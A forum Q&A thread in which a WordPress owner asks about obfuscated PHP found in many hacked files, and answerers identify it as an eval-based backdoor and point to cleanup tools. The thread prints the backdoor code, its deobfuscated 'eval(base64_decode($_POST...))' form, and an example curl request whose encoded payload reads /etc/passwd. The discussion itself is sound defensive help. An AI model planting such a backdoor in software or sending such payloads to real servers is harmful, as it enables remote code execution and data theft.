# Suspicious code found in my WordPress site - How to fix?

Tags: php, wordpress, security, spam

One of my site was hacked last night and some porno content was placed on my site.

**What I have done:**

I have removed manually the adult content from site by using FTP.

My website is up now and working fine. But, still I am able to find some code in my plugin and theme files. Which was not written by me, **Code is as below:**

```
   <?php 
        $sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n842e1c'];
if(isset($s22))
{
eval($s21($s22));
}
    ?>
```

**What my queries are:**

- What this code stands for, what is this doing?
- Is this harmful?
- Should I remove this code from my files?
- Is this will make any effect on my site if removed?

**Other Code Suggestions Required:**

This sort of code is available in 100+ files. Is there any method to remove code from all files in once? Or any method to keep code and just make it disinfect? so, it will save my time to remove code manually from too much files.

Answer (score 5, accepted):

**What this code stands for, what is this doing?**

This code is a backdoor which can be used by an attacker to execute arbitrary code. This is what the code intends to do.

```
<?php
eval( base64_decode( $_POST['n842e1c'] ) );
```

An attacker can make a post request to this file with his encoded payload in POST parameter **n842e1c** and execute PHP code.

**Example:**

```
curl -X POST -d "n842e1c=ZWNobyByZWFkZmlsZSgnL2V0Yy9wYXNzd2QnKTs=" http://PATH_TO_THIS_FILE
```

Here this `ZWNobyByZWFkZmlsZSgnL2V0Yy9wYXNzd2QnKTs=` is the BASE64 encoded string of `echo readfile('/etc/passwd');`.

**Is this harmful?**

Yes

**Should I remove this code from my files?**

Yes

**Will this make any effect on my site if removed?**

No

[Here](https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/) are some tips to help you clean the website. Also, follow [this](https://codex.wordpress.org/FAQ_My_site_was_hacked) official post by wordpress to take necessary steps.

Comment: Thanks for help. I really appreciate

Answer (score 2):

1. It's a backdoor, taking a POST parameter named `n842e1c` and execute it. Instruction is encoded as Base64.
2. It is.
3. You should immediately.
4. Nothing, remove it asap.

Maybe re-install wordpress, or you could quickly develop a script in python (or something else) to remove this string from your files.

Answer (score 1):

**PHP eval is dangerous.**

It basically executes the code within it's function. So you must remove it if you are not sure of it's use in your website.

> The eval() language construct is very dangerous because it allows
>   execution of arbitrary PHP code. Its use thus is discouraged. If you
>   have carefully verified that there is no other option than to use this
>   construct, pay special attention not to pass any user provided data
>   into it without properly validating it beforehand.
>   [Source](http://ca.php.net/manual/en/function.eval.php)

You can not disable it directly so the only choice is you remove the code from all the files.

Answer (score 1):

Try installing these free plugins on your Website.

[Sucuri WordPress Auditing](http://www.wpbeginner.com/refer/sucuri-free-wordpress-scanner-plugin/) and [Theme Authenticity Checker (TAC)](https://wordpress.org/plugins/tac/).

Follow below URLs to get some help.

https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

http://www.wpbeginner.com/beginners-guide/beginners-step-step-guide-fixing-hacked-wordpress-site/